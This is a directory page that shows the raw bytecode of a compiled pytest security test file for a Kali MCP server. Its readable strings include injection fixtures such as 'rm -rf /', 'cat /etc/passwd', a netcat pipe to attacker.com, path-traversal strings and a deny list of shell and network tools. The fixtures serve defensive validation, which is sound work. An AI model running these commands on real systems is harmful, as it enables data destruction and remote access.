Kali MCP Server

test_security.cpython-311.pyc•13.4 KiB

� ��h�*��dZddlZddlZddlmZddlmZddlZddlZGd�d��Z Gd�d��Z Gd �d ��ZGd�d��ZGd �d��Z edkrejedg��dSdS)z/Security-focused tests for the Kali MCP server.�N)�Path)�mockc�0�eZdZdZd�Zd�Zd�Zd�Zd�ZdS)�TestSecurityValidationz#Test security validation functions.c�j�gd�}|D]+}tj|��s|tjjvsJ��,dS)z,Test that tool names are properly validated.)�nmap�sqlmap�hydra�john� test-tool�tool_123N)�server�validate_tool_access�config� allowed_tools)�self�valid_names�names �./tests/test_security.py�test_tool_name_validationz0TestSecurityValidation.test_tool_name_validationsT��S�R�R�� `� `�D��.�t�4�4�_��F�M�D_�8_�8_�8_�8_�� `� `�c�D�gd�}|D]}tj|��rJ��dS)z3Test that tool name injection attempts are blocked.)znmap; rm -rf /znmap && cat /etc/passwdznmap | nc attacker.com 4444znmap`whoami`z nmap$(id)znmap || echo pwnedznmap > /tmp/pwnedznmap < /etc/passwdz nmap(nmap)z nmap{nmap}z nmap[nmap]z nmap nmapz nmap nmapz nmap nmapz nmap nmapN)rr)r�malicious_namesrs r�!test_tool_name_injection_attemptsz8TestSecurityValidation.test_tool_name_injection_attemptssH�� $$� 9� 9�D��2�4�8�8�8�8�8�8� 9� 9rc��ddlm}gd�}|D]}|d|��}|j|ksJ��gd�}|D]B}tjt d��5|d|��d d d ��n#1swxYwY�Cd S) z3Test that command arguments are properly validated.r��ToolExecutionRequest)�-Vz --versionz-sS -Oz192.168.1.1z target.comr)�tool�args)ztest; rm -rf /ztest && cat /etc/passwdztest | nc attacker.com 4444ztest`whoami`z test$(id)ztest || echo pwnedztest > /tmp/pwnedztest < /etc/passwdz test(test)z test{test}z test[test]z potentially dangerous characters��matchN)rrr �pytest�raises� ValueError)rr� valid_argsr �request�invalid_argss r�test_args_validationz+TestSecurityValidation.test_args_validation/s ��/�/�/�/�/�/�P�O�O� �� (� (�D�*�*��T�B�B�B�G��<�4�'�'�'�'�'� � � ��!� =� =�D��z�1S�T�T�T� =� =�$�$�&�t�<�<�<�<� =� =� =� =� =� =� =� =� =� =� =�� =� =� =� =�� =� =s� A'�'A+ �.A+ c��gd�}|D]"}tj|��}d|vsJ�d|vsJ��#gd�}|D](}tj|��}d|vsJ�d|vsJ�d|vsJ��)dS)z%Test path sanitization functionality.)� /tmp/testz/opt/kalimcpz /home/userz relative/path�..z//)z../../../etc/passwdz //etc//passwdz/tmp/../../../etc/passwdz /tmp//testz....//....//....//etc//passwdz etc/passwdN)r� sanitize_path)r�normal_paths�path� sanitized�malicious_pathss r�test_path_sanitizationz-TestSecurityValidation.test_path_sanitizationLs�� !� )� )�D��,�T�2�2�I��y�(�(�(�(��y�(�(�(�(�(� � � ��$� 1� 1�D��,�T�2�2�I��y�(�(�(�(��y�(�(�(�(��y�0�0�0�0�0� 1� 1rc��tjd��}gd�}|D]}||vr||dks ||�J��|ddksJ�gd�}|D]}|tjvr||vsJ��dS)z"Test sandbox environment creation.r+)� LD_PRELOAD�LD_LIBRARY_PATH� PYTHONPATH�PERL5LIB�RUBYLIB� NODE_PATH�N�PWD)�PATH�HOME�USER�SHELL�LANG�LC_ALL)r�create_sandbox_environment�os�environ)r�env�dangerous_vars�var�essential_varss r�test_sandbox_environmentz/TestSecurityValidation.test_sandbox_environmentjs��/��<�<�� "� :� :�C��c�z�z��3�x�2�~�~��S��)9�)9�)9��5�z�[�(�(�(�(�M�L�L��!� "� "�C��b�j� � ��c�z�z�z�z�� "� "rN) �__name__� __module__�__qualname__�__doc__rrr)r2rI�rrrr sh��-�-�`�`�`�9�9�9�0=�=�=�:1�1�1�<"�"�"�"�"rrc�$�eZdZdZd�Zd�Zd�ZdS)�TestToolExecutionSecurityz(Test security aspects of tool execution.c�j�gd�}|D]+}|tjjvrtj|��rJ��,dS)z1Test that only whitelisted tools can be executed.)6�rm�rmdir�del�format�fdisk�mkfs�dd�shred�wipe�srm�sdelete�wget�curl�nc�netcat�socat�bash�sh�csh�zsh�fish�python�perl�ruby�node�php�sudo�su�chmod�chown�chgrp�mount�umountrV�parted�iptables�ufwzfirewall-cmd� systemctl�service�initctl�crontab�at�batch�passwd�useradd�userdel�usermod�groupadd�groupdel�groupmod�visudo�vipw�vigrN)rrrr)r�dangerous_toolsrs r�test_tool_whitelist_enforcementz9TestToolExecutionSecurity.test_tool_whitelist_enforcement�sV�� $� =� =�D��6�=�6�6�6�!�6�t�<�<�<�<�<�� =� =rc��tjtd��5tjddd��ddd��dS#1swxYwYdS)z)Test that timeouts are properly enforced.zexceeds maximum allowedr!rri?B)�timeoutN)r#r$r%r�run_tool�rs r�test_timeout_enforcementz2TestToolExecutionSecurity.test_timeout_enforcement�s��]�:�-F� G� G� G� :� :��O�F�D�&�9�9�9�9� :� :� :� :� :� :� :� :� :� :� :� :�� :� :� :� :� :� :s�A�A�Ac�b�tjjdksJ�tjjdksJ�dS)z!Test that output size is limited.r�@N�rr�max_output_sizer�s r�test_output_size_limitingz3TestToolExecutionSecurity.test_output_size_limiting��7��}�,�q�0�0�0�0��}�,�/@�@�@�@�@�@�@rN)rJrKrLrMr�r�r�rNrrrPrP�sL��2�2�=�=�=�.:�:�:�A�A�A�A�ArrPc��eZdZdZd�Zd�ZdS)�TestInputValidationz'Test input validation and sanitization.c��ddlm}gd�}|D]}||��}|j|ksJ��gd�}|D]A}tjt d��5||��ddd��n#1swxYwY�BdS) z6Test that tool names match the expected regex pattern.rr)rr r rr �a)r)ztool with spacesztool;with;semicolonsztool|with|pipesztool&with&ampsztool`with`backticksztool$with$dollarsztool(with)parensztool<with>anglesztool[with]bracketsztool{with}bracesztool with tabsztool with newlinesztool with carriageztool/with/slashesztool\with\backslashesztool:with:colonsztool=with=equalsztool+with+plusesztool*with*asterisksztool?with?questionsztool!with!exclamationsz tool@with@atsztool#with#hashesztool%with%percentsztool^with^caretsztool~with~tildesztool"with"quotesztool'with'apostropheszcontains invalid charactersr!N)rrrr#r$r%)rrrrr'� invalid_namess r�test_tool_name_regex_validationz3TestInputValidation.test_tool_name_regex_validation�s��/�/�/�/�/�/�P�O�O�� (� (�D�*�*��5�5�5�G��<�4�'�'�'�'�'� � � � �>"� 0� 0�D��z�1N�O�O�O� 0� 0�$�$�$�/�/�/�/� 0� 0� 0� 0� 0� 0� 0� 0� 0� 0� 0�� 0� 0� 0� 0�� 0� 0s� A%�%A) �,A) c��tj��5}tj�|d��}tj|d��t dd��5t d��5}d|j_d|j_ d |j_ tjd d|��|� ��d d d ��n#1swxYwYd d d ��n#1swxYwYtj�|ddd��}tj|��}d|vsJ� d d d ��d S#1swxYwYd S)z"Test working directory validation.�validT)�exist_ok�server.validate_tool_access��return_valuezserver.subprocess.run�testr:rrr)�working_dirNr,�etc)�tempfile�TemporaryDirectoryrCr/�join�makedirs�patchr��stdout�stderr� returncoderr��assert_called_oncer-)r�temp_dir� valid_dir�mock_run� malicious_dir� sanitized_dirs r�!test_working_directory_validationz5TestInputValidation.test_working_directory_validation�s�� (� *� *� -�h��X�w�7�7�I��K� �D�1�1�1�1��4�4�H�H�H� 2� 2��2�3�3�2�x�39�H�)�0�35�H�)�0�78�H�)�4��O�F�D�i�H�H�H�H��/�/�1�1�1�2�2�2�2�2�2�2�2�2�2�2��2�2�2�2� 2� 2� 2� 2� 2� 2� 2� 2� 2� 2� 2�� 2� 2� 2� 2��G�L�L��4��u�E�E�M�"�0��?�?�M��}�,�,�,�,�,�% -� -� -� -� -� -� -� -� -� -� -� -�� -� -� -� -� -� -s[�AD4�C�,AC�<C�C�C�C�C�D4�C# �#D4�&C# �'?D4�4D8�;D8N)rJrKrLrMr�r�rNrrr�r��s9��1�1�,0�,0�,0�\-�-�-�-�-rr�c�$�eZdZdZd�Zd�Zd�ZdS)�TestResourceLimitsz&Test resource limiting and protection.c�b�tjjdksJ�tjjdksJ�dS)z"Test that memory usage is limited.rr�Nr�r�s r�test_memory_usage_protectionz/TestResourceLimits.test_memory_usage_protection�r�rc�b�tjjdksJ�tjjdksJ�dS)z/Test that CPU time is limited through timeouts.riN)rr�max_timeoutr�s r�test_cpu_time_limitingz)TestResourceLimits.test_cpu_time_limitings6��}�(�1�,�,�,�,��}�(�4�/�/�/�/�/�/rc��tjj�J�tjj�d��sJ�tjd��}d|vs|ddksJ�dSdS)z+Test that file system access is restricted.N�/r+r4r:)rr�working_directory� startswithrB)rrEs r�test_file_system_protectionz.TestResourceLimits.test_file_system_protectionsr��}�.�:�:�:��}�.�9�9�#�>�>�>�>�>��/��<�<��3�&�&�#�l�*;�r�*A�*A�*A�*A�&�&�*A�*ArN)rJrKrLrMr�r�r�rNrrr�r��sO��0�0�A�A�A�0�0�0�B�B�B�B�Brr�c��eZdZdZd�Zd�ZdS)�TestLoggingSecurityz!Test security aspects of logging.c�n�tj�J�tjjtjjksJ�dS)z'Test that sensitive data is not logged.N)r�logger�level�logging�INFOr�s r�test_sensitive_data_not_loggedz2TestLoggingSecurity.test_sensitive_data_not_loggeds3��}�(�(�(��}�"�f�n�&9�9�9�9�9�9�9rc�(�td��5}tdd��5 tjdd��n#tj$rYnwxYw|��ddd��n#1swxYwYddd��dS#1swxYwYdS)z%Test that security events are logged.zserver.logger.warningr�Fr�rRr�N)r�rr�� SecurityError� assert_called)r�mock_warnings r�test_security_events_loggedz/TestLoggingSecurity.test_security_events_loggeds.��*� +� +� -�|��4�5�I�I�I� -� -��O�D�&�1�1�1�1��+��D��*�*�,�,�,� -� -� -� -� -� -� -� -� -� -� -�� -� -� -� -� -� -� -� -� -� -� -� -� -� -� -� -�� -� -� -� -� -� -sT�B�A/�:�A/�A� A/�A�A/�#B�/A3 �3B�6A3 �7B�B�BN)rJrKrLrMr�r�rNrrr�r�s8��+�+�:�:�:� -� -� -� -� -rr��__main__z-v)rMrCr��pathlibr�unittestrr#rrrPr�r�r�rJ�main�__file__rNrr�<module>r�sp��5�5� � � � �� v"�v"�v"�v"�v"�v"�v"�v"�r%A�%A�%A�%A�%A�%A�%A�%A�PE-�E-�E-�E-�E-�E-�E-�E-�PB�B�B�B�B�B�B�B�6-�-�-�-�-�-�-�-�.�z��F�K��4� �!�!�!�!�!��r

Loading blob content...

Latest Blog Posts

Redis vs ioredis vs valkey-glide
By punkpeye on January 26, 2026.
benchmark
Redis
valkey
Quickstart: Publish an MCP Server to the MCP Registry
By punkpeye on January 24, 2026.
mcp
official reference mirror
Official MCP Registry Server.json Requirements
By punkpeye on January 24, 2026.
mcp
official reference mirror

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/DurkDiggler/Kali-MCP-Server'

If you have feedback or need assistance with the MCP directory API, please join our Discord server

test_security.cpython-311.pyc•13.4 KiB